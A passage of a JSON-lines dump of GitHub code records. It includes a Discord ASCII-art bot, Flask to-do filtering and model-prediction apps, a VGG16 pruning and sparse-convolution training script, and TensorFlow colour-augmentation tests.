plot_gl_vs_wdist(\n data, figname=\"gl_vs_wdist_unnorm.pdf\",\n figtitle=r\"Autoencoder Gauss length vs weight distance\",\n threshold=threshold,\n normalized=False\n )\n\n\nif __name__ == \"__main__\":\n main(args.summary_path, args.thresh)","repo_name":"AtheMathmo/mli-release","sub_path":"scripts/train_ae_fc/visualizations/plot_gl_vs_wdist.py","file_name":"plot_gl_vs_wdist.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"36809200007","text":"import os\nimport discord\nfrom discord.ext import commands\nimport pil\n\nintents = discord.Intents.default()\nintents.message_content = True\nintents.members = True\nbot = commands.Bot(command_prefix='!', intents = intents)\n@bot.command(name='test', help='input url and name the image, converts inputted image to ascii art')\nasync def test(ctx, url):\n print(url)\n pil.url = url\n print(pil.url)\n print(pil.ascii_converter(pil.url))\n file1 = open('ascii_image.txt', 'r')\n lines = file1.readlines()\n print(lines)\n await ctx.send(\"I made this for you: \\n\")\n await ctx.send(\"\\n {0}\".format(lines))\n\n\n@bot.command()\nasync def echo(ctx, arg):\n await ctx.send(arg)\n \nbot.run(os.getenv('TOKEN'))\n","repo_name":"JustenYergo/Image-to-ASCII-Converting-Discord-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27361774855","text":"from flask import render_template, redirect, request, session\nfrom logic.tasksLogic import TaskLogic\nimport random\nimport requests\n\n\nclass FilterRoutes:\n @staticmethod\n def configure_routes(app):\n @app.route(\"/filterTasks\", methods=[\"GET\", \"POST\"])\n def filterTasks():\n if request.method == \"GET\":\n return redirect(\"todolist\")\n elif request.method == \"POST\":\n logic = TaskLogic()\n\n # Recuperando informacion sobre el usuario\n userid = session.get(\"login_user_id\")\n username = session.get(\"login_user_name\")\n\n # Pidiendo la fecha a aplicar los filtros\n date = session.get(\"current_date\")\n print(date)\n\n categorias = logic.traerCategorias()\n\n # Recuperando Informacion del form\n sol_prioridad = request.form[\"filtroPrioridad\"]\n sol_categoria = request.form[\"filtroCategoria\"]\n sol_estado = request.form[\"filtroEstado\"]\n\n print(sol_prioridad, sol_categoria, sol_estado)\n\n dataJson = []\n # Recovering tip from API\n messageAPIFailure_tip = \"\"\n tipsIDs = []\n 
                randomtip = {}\n                restapi = \"https://apicarbono.herokuapp.com\"\n                endpoint = \"/contenido\"\n                categoriasapi = [\"/Libro\", \"/Consejos\", \"/Charla\"]\n                categoriaapi = random.choice(categoriasapi)\n\n                url = f\"{restapi}{endpoint}{categoriaapi}\"\n\n                response = requests.get(url)\n                print(response)\n                if response.status_code == 200:\n                    dataJson = response.json()\n\n                    for tip in dataJson:\n                        tipsIDs.append(tip[\"id\"])\n\n                    randomtipid = random.choice(tipsIDs)\n\n                    for tip in dataJson:\n                        if int(tip[\"id\"]) == randomtipid:\n                            randomtip = tip\n\n                    print(\"Chosen\", randomtip, sep=\"||\")\n\n                else:\n                    messageAPIFailure_tip = \"No hay recomendación por el momento. Recarga la página si deseas volver a probar.\"\n\n                # Recovering trainer from API\n                trainerIDs = []\n                randomtrainer = {}\n                messageAPIFailure_trainer = \"\"\n                restapi = \"https://apicarbono.herokuapp.com\"\n                endpoint = \"/trainers\"\n                categoriasapi = [\"/Efectividad\", \"/Liderazgo\",\n                                 \"/Organizacion\", \"/Productividad\"]\n                categoriaapi = random.choice(categoriasapi)\n\n                url = f\"{restapi}{endpoint}{categoriaapi}\"\n\n                response = requests.get(url)\n                print(response)\n                if response.status_code == 200:\n                    dataJson = response.json()\n\n                    for trainer in dataJson:\n                        trainerIDs.append(trainer[\"id\"])\n\n                    randomtrainerid = random.choice(trainerIDs)\n                    \n\n                    for trainer in dataJson:\n                        if int(trainer[\"id\"]) == randomtrainerid:\n                            randomtrainer = trainer\n\n                    print(\"Chosen\", randomtrainer, sep=\"||\")\n                else:\n                    messageAPIFailure_trainer = \"No hay trainer por el momento. Recarga la página si deseas volver a probar.\"\n\n\n                # Check whether the user is a Client or an Administrator\n                if int(session.get(\"login_user_CA\")) == 0:\n                    tasksAll = logic.getAllTasksByUser(userid)\n                    tasks, filteredTasks, filteredTasksIDs = [[], [], []]\n                    fprior, fcat, fest = [[], [], []]\n\n                    # Check the date of the tasks\n                    for task in tasksAll:\n                        if date == str(task[\"date\"]):\n                            tasks.append(task)\n                        else:\n                            continue\n\n                    # Filter by priority\n                    if sol_prioridad != \"-\":\n                        for task in tasks:\n                            if sol_prioridad == str(task[\"priority\"]):\n                                fprior.append(task[\"taskid\"])\n                            else:\n                                continue\n                    else:\n                        for task in tasks:\n                            fprior.append(task[\"taskid\"])\n\n                    # Filter by category\n                    if sol_categoria != \"-\":\n                        for task in tasks:\n                            if sol_categoria == str(task[\"categoria\"]):\n                                fcat.append(task[\"taskid\"])\n                            else:\n                                continue\n                    else:\n                        for task in tasks:\n                            fcat.append(task[\"taskid\"])\n\n                    # Filter by status\n                    if sol_estado != \"-\":\n                        for task in tasks:\n                            if sol_estado == str(task[\"estado\"]):\n                                fest.append(task[\"taskid\"])\n                            else:\n                                continue\n                    else:\n                        for task in tasks:\n                            fest.append(task[\"taskid\"])\n\n                    # Intersect the filtered ID lists\n                    for currentID in fprior:\n                        if currentID in fcat and currentID in fest:\n                            filteredTasksIDs.append(currentID)\n                    print(filteredTasksIDs)\n\n                    # Find the matching tasks\n                    for task in tasks:\n                        if task[\"taskid\"] in filteredTasksIDs:\n                            filteredTasks.append(task)\n\n                    if session.get(\"date_tasksIDs\"):\n                        session.pop(\"date_tasksIDs\")\n                        print(\"Found a previous list and removed it!\")\n\n                    session[\"date_tasksIDs\"] = filteredTasksIDs\n\n                    print(filteredTasks)\n\n                    return render_template(\"todolist.html\", userid=userid, username=username,\n                                            tasks=filteredTasks, date=date, categorias=categorias,\n                                            recomendacion=randomtip, trainer=randomtrainer,\n                                            failTip = messageAPIFailure_tip, failTrainer = messageAPIFailure_trainer)\n\n                elif int(session.get(\"login_user_CA\")) == 1:\n                    tasksCAll = logic.getAllTasksClients()\n                    tasksAAll = logic.getAllTasksByUser(userid)\n
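                    # Admin view: client tasks and the admin's own tasks are kept in
                    # separate lists and filtered with the same priority/category/status criteria.\n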
                    tasksC, tasksA = [[], []]\n                    filteredTasksC, filteredTasksA, filteredTasksIDs = [\n                        [], [], []]\n                    fpriorC, fcatC, festC = [[], [], []]\n                    fpriorA, fcatA, festA = [[], [], []]\n\n                    # Check the date of the tasks\n                    for task in tasksCAll:\n                        if date == str(task[\"date\"]):\n                            tasksC.append(task)\n                        else:\n                            continue\n\n                    for task in tasksAAll:\n                        if date == str(task[\"date\"]):\n                            tasksA.append(task)\n                        else:\n                            continue\n\n                    # Filter by priority\n                    if sol_prioridad != \"-\":\n                        for task in tasksC:\n                            if sol_prioridad == str(task[\"priority\"]):\n                                fpriorC.append(task[\"taskid\"])\n                            else:\n                                continue\n\n                        for task in tasksA:\n                            if sol_prioridad == str(task[\"priority\"]):\n                                fpriorA.append(task[\"taskid\"])\n                            else:\n                                continue\n                    else:\n                        for task in tasksC:\n                            fpriorC.append(task[\"taskid\"])\n\n                        for task in tasksA:\n                            fpriorA.append(task[\"taskid\"])\n\n                    # Filter by category\n                    if sol_categoria != \"-\":\n                        for task in tasksC:\n                            if sol_categoria == str(task[\"categoria\"]):\n                                fcatC.append(task[\"taskid\"])\n                            else:\n                                continue\n\n                        for task in tasksA:\n                            if sol_categoria == str(task[\"categoria\"]):\n                                fcatA.append(task[\"taskid\"])\n                            else:\n                                continue\n                    else:\n                        for task in tasksC:\n                            fcatC.append(task[\"taskid\"])\n\n                        for task in tasksA:\n                            fcatA.append(task[\"taskid\"])\n\n                    # Filter by status\n                    if sol_estado != \"-\":\n                        for task in tasksC:\n                            if sol_estado == str(task[\"estado\"]):\n                                festC.append(task[\"taskid\"])\n                            else:\n                                continue\n\n                        for task in tasksA:\n                            if sol_estado == str(task[\"estado\"]):\n                                festA.append(task[\"taskid\"])\n                            else:\n                                continue\n                    else:\n                        for task in tasksC:\n                            festC.append(task[\"taskid\"])\n\n                        for task in tasksA:\n                            festA.append(task[\"taskid\"])\n\n                    # Intersect the filtered ID lists\n                    for currentID in fpriorC:\n                        if currentID in fcatC and currentID in festC:\n                            filteredTasksIDs.append(currentID)\n\n                    for currentID in fpriorA:\n                        if currentID in fcatA and currentID in festA:\n                            filteredTasksIDs.append(currentID)\n\n                    # Find the matching tasks\n                    for task in tasksC:\n                        if task[\"taskid\"] in filteredTasksIDs:\n                            filteredTasksC.append(task)\n\n                    for task in tasksA:\n                        if task[\"taskid\"] in filteredTasksIDs:\n                            filteredTasksA.append(task)\n\n                    if session.get(\"date_tasksIDs\"):\n                        session.pop(\"date_tasksIDs\")\n                        print(\"Found a previous list and removed it!\")\n\n                    session[\"date_tasksIDs\"] = filteredTasksIDs\n\n                    print(filteredTasksC, filteredTasksA, sep=\"|**|\")\n                    return render_template(\"dashboardToDo.html\", userid=userid, username=username,\n                                           tasksC=filteredTasksC, tasksA=filteredTasksA, date=date,\n                                           categorias=categorias, recomendacion=randomtip, trainer=randomtrainer,\n                                           failTip = messageAPIFailure_tip, failTrainer = messageAPIFailure_trainer)\n","repo_name":"DAP-web/Carbono","sub_path":"routes/filter_routes.py","file_name":"filter_routes.py","file_ext":"py","file_size_in_byte":11557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"40573997621","text":"from flask import Flask, request, render_template\nimport pickle\nimport pandas as pandas\nimport numpy as np\n\napp = Flask(__name__)\n\nmodel_file = open('model.pkl', 'rb')\nmodel = pickle.load(model_file, encoding='bytes')\n\n@app.route('/')\ndef index():\n    return render_template('index.html', JURUSAN=0)\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n    '''\n    Predict the student's major (JURUSAN) from the submitted form inputs\n    and render the result to the html page\n    '''\n    JENIS_KELAMIN, KABUPATEN_KOTA, PROVINSI, JENJANG, TAHUN_LULUS= [x for x in request.form.values()]\n\n    data = []\n
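    # Only the graduation year (TAHUN_LULUS) reaches the model below; the other
    # form fields are echoed back to the template for display. A fuller feature
    # vector would also encode the categorical fields, e.g. with a hypothetical
    # fitted 'encoder' object (not defined in this app):
    #   data = encoder.transform([[JENIS_KELAMIN, KABUPATEN_KOTA, PROVINSI, JENJANG]])\n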
    JENIS_KELAMIN=str(request.form['JENIS_KELAMIN'])\n    KABUPATEN_KOTA=str(request.form['KABUPATEN_KOTA'])\n    PROVINSI=str(request.form['PROVINSI'])\n    JENJANG=str(request.form['JENJANG'])\n    data.append(int(TAHUN_LULUS))\n\n\n\n\n    prediction = model.predict([data])\n    output = prediction \n    \n    return render_template('index.html', JURUSAN=output, JENIS_KELAMIN=JENIS_KELAMIN, KABUPATEN_KOTA=KABUPATEN_KOTA, \n                            PROVINSI=PROVINSI, JENJANG=JENJANG, TAHUN_LULUS=TAHUN_LULUS )\n\n\n
if __name__ == '__main__':\n    app.run(debug=True)","repo_name":"wiwinhandoko/predict-pmb","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"39858196645","text":"from training_helper import *\n\n\nimport torch.nn.utils.prune as prune\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nimport torch.nn.init as init\nfrom torchsummary import summary\nimport torch.optim as optim\n\n
class VGG16(nn.Module):\n    \"\"\"\n    A standard VGG16 model\n    \"\"\"\n\n    def __init__(self, n_classes,sparse_conv_flag=True):\n        self._sparse_conv_flag=sparse_conv_flag\n        super(VGG16, self).__init__()\n\n        self.layer1 = nn.Sequential(\n            nn.Conv2d(1, 64, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(64),\n            nn.ReLU())\n        self.layer2 = nn.Sequential(\n            nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(64),\n            nn.ReLU(), \n            nn.MaxPool2d(kernel_size = 2, stride = 2))\n        self.layer3 = nn.Sequential(\n            nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(128),\n            nn.ReLU())\n        self.layer4 = nn.Sequential(\n            nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(128),\n            nn.ReLU(),\n            nn.MaxPool2d(kernel_size = 2, stride = 2))\n        self.layer5 = nn.Sequential(\n            nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(256),\n            nn.ReLU())\n        self.layer6 = nn.Sequential(\n            nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(256),\n            nn.ReLU())\n        self.layer7 = nn.Sequential(\n            nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(256),\n            nn.ReLU(),\n            nn.MaxPool2d(kernel_size = 2, stride = 2))\n        self.layer8 = nn.Sequential(\n            nn.Conv2d(256, 512, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(512),\n            nn.ReLU())\n        self.layer9 = nn.Sequential(\n            nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(512),\n            nn.ReLU())\n        self.layer10 = nn.Sequential(\n            nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(512),\n            nn.ReLU(),\n            nn.MaxPool2d(kernel_size = 2, stride = 2))\n        self.layer11 = nn.Sequential(\n            nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(512),\n            nn.ReLU())\n        self.layer12 = nn.Sequential(\n            nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(512),\n            nn.ReLU())\n        self.layer13 = nn.Sequential(\n            nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n            nn.BatchNorm2d(512),\n            nn.ReLU(),\n            nn.MaxPool2d(kernel_size = 2, stride = 2))\n        self.fc = nn.Sequential(\n            nn.Dropout(0.5),\n            nn.Linear(512, 4096),\n            nn.ReLU())\n        self.fc1 = nn.Sequential(\n            nn.Dropout(0.5),\n            nn.Linear(4096, 4096),\n            nn.ReLU())\n        self.fc2= nn.Sequential(\n            nn.Linear(4096, n_classes))\n    \n    def forward(self, x):\n        out = self.layer1(x)\n        out = self.layer2(out)\n        out = self.layer3(out)\n        out = self.layer4(out)\n        out = self.layer5(out)\n        out = self.layer6(out)\n        out = self.layer7(out)\n
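        # layers 8-13: the 512-channel convolution blocks that feed the classifier head\n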
        out = self.layer8(out)\n        out = self.layer9(out)\n        out = self.layer10(out)\n        out = self.layer11(out)\n        out = self.layer12(out)\n        out = self.layer13(out)\n        out = out.reshape(out.size(0), -1)\n        out = self.fc(out)\n        out = self.fc1(out)\n        out = self.fc2(out)\n        return out\n    #Required only for benchmark Conv2d vs SparseConv\n    def setSparseConvUsage(self,usage=True):\n        self.layer1[0].use_sparse = usage\n        self.layer2[0].use_sparse = usage\n        self.layer3[0].use_sparse = usage\n        self.layer4[0].use_sparse = usage\n        self.layer5[0].use_sparse = usage\n        self.layer6[0].use_sparse = usage\n        self.layer7[0].use_sparse = usage\n        self.layer8[0].use_sparse = usage\n        self.layer9[0].use_sparse = usage\n        self.layer10[0].use_sparse = usage\n        self.layer11[0].use_sparse = usage\n        self.layer12[0].use_sparse = usage\n        self.layer13[0].use_sparse = usage\n\n    def make_weights_sparse(self):\n        '''\n        Allow the convolution to compute the sparse representation of the weights\n        '''\n        self.layer1[0].load()\n        self.layer2[0].load()\n        self.layer3[0].load()\n        self.layer4[0].load()\n        self.layer5[0].load()\n        self.layer6[0].load()\n        self.layer7[0].load()\n        self.layer8[0].load()\n        self.layer9[0].load()\n        self.layer10[0].load()\n        self.layer11[0].load()\n        self.layer12[0].load()\n        self.layer13[0].load()\n
def load_datasets(BATCH_SIZE):\n    '''\n    Here we load and prepare the data, just a simple resize should\n    be enough\n    '''\n    transf = transforms.Compose([transforms.Resize((32, 32)), transforms.ToTensor()])\n\n    # download and create datasets\n    train_dataset = datasets.MNIST(root='mnist_data',\n                                   train=True,\n                                   transform=transf,\n                                   download=True)\n\n    valid_dataset = datasets.MNIST(root='mnist_data',\n                                   train=False,\n                                   transform=transf)\n\n    train_loader = DataLoader(dataset=train_dataset,\n                              batch_size=BATCH_SIZE,\n                              shuffle=True)\n\n    valid_loader = DataLoader(dataset=valid_dataset,\n                              batch_size=BATCH_SIZE,\n                              shuffle=False)\n\n    return train_dataset, valid_dataset, train_loader, valid_loader\n\n\n
train_dataset, valid_dataset, train_loader, valid_loader = load_datasets(BATCH_SIZE=128)\n\nN_CLASSES = 10\nLEARNING_RATE = 0.001\nSPARSITY_LEVEL = 0.5 #TODO (Integrate into the train function)\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nTRAIN_CONSTANTS.device = device\nprint(f\"DEVICE IN USE{device}\")\n\nmodel = VGG16(N_CLASSES,sparse_conv_flag=False)\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(model.parameters(), lr=LEARNING_RATE, momentum=0.9)\n\n
#Step1. Train the model in the classic way:\ntrain_model(model,train_loader,criterion,optimizer,1,warm_up=0,print_frequency=100,pruning_routine=applyDummyPruningRoutine)\ngolden_model = copy.deepcopy(model) #Copy the classic model\n\n
#Step2. FineTune the model using pruning at each epoch (USE FIP + regroup)\nmodel = copy.deepcopy(golden_model)\ntrain_model(model,train_loader,criterion,optimizer,2,warm_up=0,print_frequency=100,pruning_routine=applyPruningRegroup)\nregroup_model = copy.deepcopy(model) #Copy the regroup model\n\n\n
#Step3. FineTune the model using pruning at each epoch (USE FIP + refill)\nmodel = copy.deepcopy(golden_model)\ntrain_model(model,train_loader,criterion,optimizer,2,warm_up=0,print_frequency=100,pruning_routine=applyPruningRefill)\nrefill_model = copy.deepcopy(model) #Copy the refill model\n\n#Step4. 
Compare Golden vs Refill vs Regroup","repo_name":"NicolaDean/sparse-conv_regroup_pytorch","sub_path":"SparseConv/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20611378461","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport pytest\nfrom six.moves import mock, xrange\nimport tensorflow as tf\n\nfrom nvidia_tao_tf1.core.processors.augment import color\nfrom nvidia_tao_tf1.core.processors.augment.testing_utils import (\n assert_truncated_normal_distribution,\n assert_uniform_distribution,\n sample_tensors,\n)\nfrom nvidia_tao_tf1.core.utils import set_random_seed\n\nNUM_SAMPLES = 1000\n\n\ndef tile_color_matrix(ctm, batch_size):\n \"\"\"Tile a color matrix batch_size number of times.\"\"\"\n if batch_size is None:\n return ctm\n return np.tile(np.reshape(ctm, [1, 4, 4]), [batch_size, 1, 1])\n\n\ndef identity_color_matrix(batch_size):\n \"\"\"Return a batched identity matrix.\"\"\"\n ctm = np.eye(4, dtype=np.float32)\n return tile_color_matrix(ctm, batch_size)\n\n\n@pytest.fixture(scope=\"module\")\ndef get_random_image(batch_size, start=0.0, stop=1.0):\n \"\"\"Create a batch of images, with values within a linspace, that are then randomly shuffled.\"\"\"\n shape = (batch_size, 16, 64, 3)\n images = np.linspace(start, stop, batch_size * 3072, dtype=np.float32).reshape(\n shape\n )\n return np.random.permutation(images)\n\n\noffset_tests = [(0.0, 0.0, 0.0), (1.0, 1.0, 1.0), (-1.0, -1.0, -1.0), (0.1, 0.2, 0.3)]\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 3])\n@pytest.mark.parametrize(\"offset\", offset_tests)\ndef test_brightness_offset_matrix(batch_size, offset):\n \"\"\"Test the brightness offset matrix, by checking it's an identity matrix with offsets.\"\"\"\n if batch_size is not None:\n offset = np.tile(offset, [batch_size, 1])\n m = color.brightness_offset_matrix(offset)\n m_np = tf.compat.v1.Session().run(m)\n if batch_size is not None:\n assert m_np.shape == (batch_size, 4, 4)\n created_offsets = m_np[:, 3, 0:3]\n else:\n assert m_np.shape == (4, 4)\n created_offsets = m_np[3, 0:3]\n\n # Test the validity of the offsets\n np.testing.assert_allclose(\n offset,\n created_offsets,\n rtol=1e-6,\n err_msg=\"Offset matrix contains different offset values than those \"\n \"supplied.\",\n )\n\n # Test the rest of the matrix is untouched (identity)\n # Zero out the offests, so we can test versus an identity matrix.\n if batch_size is not None:\n m_np[:, 3, 0:3] = 0.0\n else:\n m_np[3, 0:3] = 0.0\n expected = identity_color_matrix(batch_size)\n np.testing.assert_allclose(\n expected,\n m_np,\n rtol=1e-6,\n err_msg=\"Brightness offset matrix introduced non-identity values \"\n \"in elements other than the expected offsets.\",\n )\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 10])\ndef test_brightness_offset_matrix2(batch_size):\n \"\"\"Test that brightness offset matrix matches expected value.\"\"\"\n if batch_size is None:\n r = 0.5\n g = 1.0\n b = 1.5\n offset = [r, g, b]\n expected_ctm = np.array(\n [\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 1.0, 0.0, 0.0],\n [0.0, 0.0, 1.0, 0.0],\n [r, g, b, 1.0],\n ]\n )\n else:\n r = np.linspace(-0.5, 0.5, batch_size)\n g = np.linspace(-1.0, 1.0, batch_size)\n b = np.linspace(-1.5, 1.5, batch_size)\n offset = np.transpose(np.array([r, g, b]))\n\n zero = np.zeros_like(r)\n one = np.ones_like(zero)\n expected_ctm = 
np.array(\n [\n [one, zero, zero, zero],\n [zero, one, zero, zero],\n [zero, zero, one, zero],\n [r, g, b, one],\n ]\n )\n # Swap the batch dimension first.\n expected_ctm = np.transpose(expected_ctm, [2, 0, 1])\n\n m = color.brightness_offset_matrix(offset)\n m_np = tf.compat.v1.Session().run(m)\n\n np.testing.assert_allclose(\n expected_ctm,\n m_np,\n atol=1e-2,\n err_msg=\"Brightness offset matrix does not match expected value.\",\n )\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 3])\n@pytest.mark.parametrize(\"contrast\", [-0.5, 0.0, 0.5, 1.0])\n@pytest.mark.parametrize(\"center\", [1.0 / 2.0, 255.0 / 2.0])\ndef test_contrast_matrix(batch_size, contrast, center):\n \"\"\"Test the contrast matrix.\"\"\"\n zero_contrast = contrast == 0.0\n\n if batch_size is not None:\n contrast = np.tile(contrast, [batch_size])\n center = np.tile(center, [batch_size])\n\n m = color.contrast_matrix(contrast=contrast, center=center)\n m_np = tf.compat.v1.Session().run(m)\n\n if zero_contrast:\n np.testing.assert_allclose(\n identity_color_matrix(batch_size),\n m_np,\n rtol=1e-6,\n err_msg=\"Zero contrast did not result in the identity matrix.\",\n )\n\n if batch_size is not None:\n assert m_np.shape == (batch_size, 4, 4)\n m = m_np[0]\n else:\n assert m_np.shape == (4, 4)\n m = m_np\n bias = np.unique(m[3, 0:3])\n scale = np.unique([m[0, 0], m[1, 1], m[2, 2]])\n assert len(scale) == 1, \"Contrast scale is different across channels.\"\n assert len(bias) == 1, \"Contrast bias is different across channels.\"\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 10])\ndef test_contrast_matrix2(batch_size):\n \"\"\"Test that contrast matrix matches expectation.\"\"\"\n if batch_size is None:\n contrast = 1.5\n center = 0.5\n else:\n contrast = np.linspace(0.0, 2.0, batch_size)\n center = np.linspace(-1.0, 1.0, batch_size)\n\n m = color.contrast_matrix(contrast=contrast, center=center)\n m_np = tf.compat.v1.Session().run(m)\n\n zero = np.zeros_like(contrast)\n one = np.ones_like(contrast)\n scale = one + contrast\n bias = -contrast * center\n expected_ctm = np.array(\n [\n [scale, zero, zero, zero],\n [zero, scale, zero, zero],\n [zero, zero, scale, zero],\n [bias, bias, bias, one],\n ]\n )\n if batch_size is not None:\n # Swap the batch dimension first.\n expected_ctm = np.transpose(expected_ctm, [2, 0, 1])\n\n np.testing.assert_allclose(\n expected_ctm,\n m_np,\n atol=1e-2,\n err_msg=\"Contrast matrix does not match expected value.\",\n )\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 3])\n@pytest.mark.parametrize(\"hue\", [0.0, 360.0])\n@pytest.mark.parametrize(\"saturation\", [0.0, 1.0])\ndef test_hue_saturation_matrix(batch_size, hue, saturation):\n \"\"\"\n Test the hue and saturation matrix.\n\n The tests are quite tolerant because a perfect HSV conversion cannot be done with a linear\n matrices. 
For more information, review the docs of the method.\n \"\"\"\n check_identity = hue in [0.0, 360.0] and saturation == 1.0\n zero_saturation = saturation == 0.0\n\n if batch_size is not None:\n hue = np.tile(hue, [batch_size])\n saturation = np.tile(saturation, [batch_size])\n\n m = color.hue_saturation_matrix(hue=hue, saturation=saturation)\n m_np = tf.compat.v1.Session().run(m)\n\n if batch_size is None:\n assert m_np.shape == (4, 4)\n else:\n assert m_np.shape == (batch_size, 4, 4)\n\n if check_identity:\n np.testing.assert_allclose(\n identity_color_matrix(batch_size),\n m_np,\n atol=1e-2,\n err_msg=\"No hue and saturation changed did not result in the \"\n \"identity matrix.\",\n )\n\n # Zero saturation should result in equal weighting of all channels\n if zero_saturation:\n for c in range(1, 3):\n # Compare the 2nd and 3rd channel with the first.\n if batch_size is not None:\n m0 = m_np[:, 0:3, 0]\n mc = m_np[:, 0:3, c]\n else:\n m0 = m_np[0:3, 0]\n mc = m_np[0:3, c]\n np.testing.assert_array_equal(\n m0,\n mc,\n err_msg=\"Zero saturation resulted in differences across \" \"channels.\",\n )\n\n\n@pytest.mark.parametrize(\"batch_size\", [None, 10])\ndef test_hue_saturation_matrix2(batch_size):\n \"\"\"Test that hue and saturation matrix matches expected value.\"\"\"\n if batch_size is None:\n hue = 45.0\n saturation = 1.0\n else:\n hue = np.linspace(0.0, 360.0, batch_size)\n saturation = np.linspace(0.0, 2.0, batch_size)\n\n m = color.hue_saturation_matrix(hue=hue, saturation=saturation)\n m_np = tf.compat.v1.Session().run(m)\n\n const_mat = np.array(\n [\n [0.299, 0.299, 0.299, 0.0],\n [0.587, 0.587, 0.587, 0.0],\n [0.114, 0.114, 0.114, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ],\n dtype=np.float32,\n )\n sch_mat = np.array(\n [\n [0.701, -0.299, -0.300, 0.0],\n [-0.587, 0.413, -0.588, 0.0],\n [-0.114, -0.114, 0.886, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n ],\n dtype=np.float32,\n )\n ssh_mat = np.array(\n [\n [0.168, -0.328, 1.25, 0.0],\n [0.330, 0.035, -1.05, 0.0],\n [-0.497, 0.292, -0.203, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n ],\n dtype=np.float32,\n )\n\n angle = hue * (np.pi / 180.0)\n\n if batch_size is not None:\n const_mat = np.tile(const_mat, [batch_size, 1, 1])\n sch_mat = np.tile(sch_mat, [batch_size, 1, 1])\n ssh_mat = np.tile(ssh_mat, [batch_size, 1, 1])\n angle = np.reshape(angle, [batch_size, 1, 1])\n saturation = np.reshape(saturation, [batch_size, 1, 1])\n\n expected_ctm = const_mat + saturation * (\n np.cos(angle) * sch_mat + np.sin(angle) * ssh_mat\n )\n\n np.testing.assert_allclose(\n expected_ctm,\n m_np,\n atol=1e-2,\n err_msg=\"Hue and saturation matrix does not match expected value.\",\n )\n\n\n@mock.patch(\n \"nvidia_tao_tf1.core.processors.augment.color.hue_saturation_matrix\",\n side_effect=lambda h, s: (h, s),\n)\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\n@pytest.mark.parametrize(\"hue_rotation_max\", [0.0, 100.0])\n@pytest.mark.parametrize(\"saturation_shift_max\", [0.0, 0.5])\n@pytest.mark.parametrize(\"hue_center\", [0.0, 50.0])\n@pytest.mark.parametrize(\"saturation_shift_min\", [-100.0, 0.0, None])\ndef test_random_hue_saturation_matrix(\n patched,\n batch_size,\n hue_rotation_max,\n saturation_shift_max,\n hue_center,\n saturation_shift_min,\n):\n \"\"\"Test that random_hue_saturation_matrix produces correct distributions.\"\"\"\n set_random_seed(42)\n tensors = color.random_hue_saturation_matrix(\n hue_rotation_max,\n saturation_shift_max,\n batch_size=batch_size,\n hue_center=hue_center,\n saturation_shift_min=saturation_shift_min,\n )\n hue_rotations, 
saturation_shifts = sample_tensors(tensors, NUM_SAMPLES)\n\n assert_truncated_normal_distribution(\n hue_rotations, mean=hue_center, stddev=hue_rotation_max / 2.0\n )\n\n if saturation_shift_min is None:\n saturation_shift_min = -saturation_shift_max\n\n min_bound = 1.0 + saturation_shift_min\n max_bound = 1.0 + saturation_shift_max\n assert_uniform_distribution(saturation_shifts, min_bound, max_bound)\n\n\n@mock.patch(\"nvidia_tao_tf1.core.processors.augment.color.tf.random.truncated_normal\")\n@mock.patch(\n \"nvidia_tao_tf1.core.processors.augment.color.hue_saturation_matrix\",\n side_effect=color.hue_saturation_matrix,\n)\n@pytest.mark.parametrize(\"batch_size\", [None, 4])\ndef test_random_hue_saturation_matrix_samples_hue(\n mocked_hue_saturation_matrix, mocked_truncated_normal, batch_size\n):\n hue = tf.constant(42, dtype=tf.float32)\n mocked_truncated_normal.return_value = hue\n color.random_hue_saturation_matrix(\n hue_rotation_max=180.0, saturation_shift_max=0.0, batch_size=batch_size\n )\n\n expected_shape = [] if batch_size is None else [batch_size]\n mocked_truncated_normal.assert_called_with(expected_shape, mean=0.0, stddev=90.0)\n mocked_hue_saturation_matrix.assert_called_with(hue, mock.ANY)\n\n\n@mock.patch(\"nvidia_tao_tf1.core.processors.augment.color.tf.random.uniform\")\n@mock.patch(\n 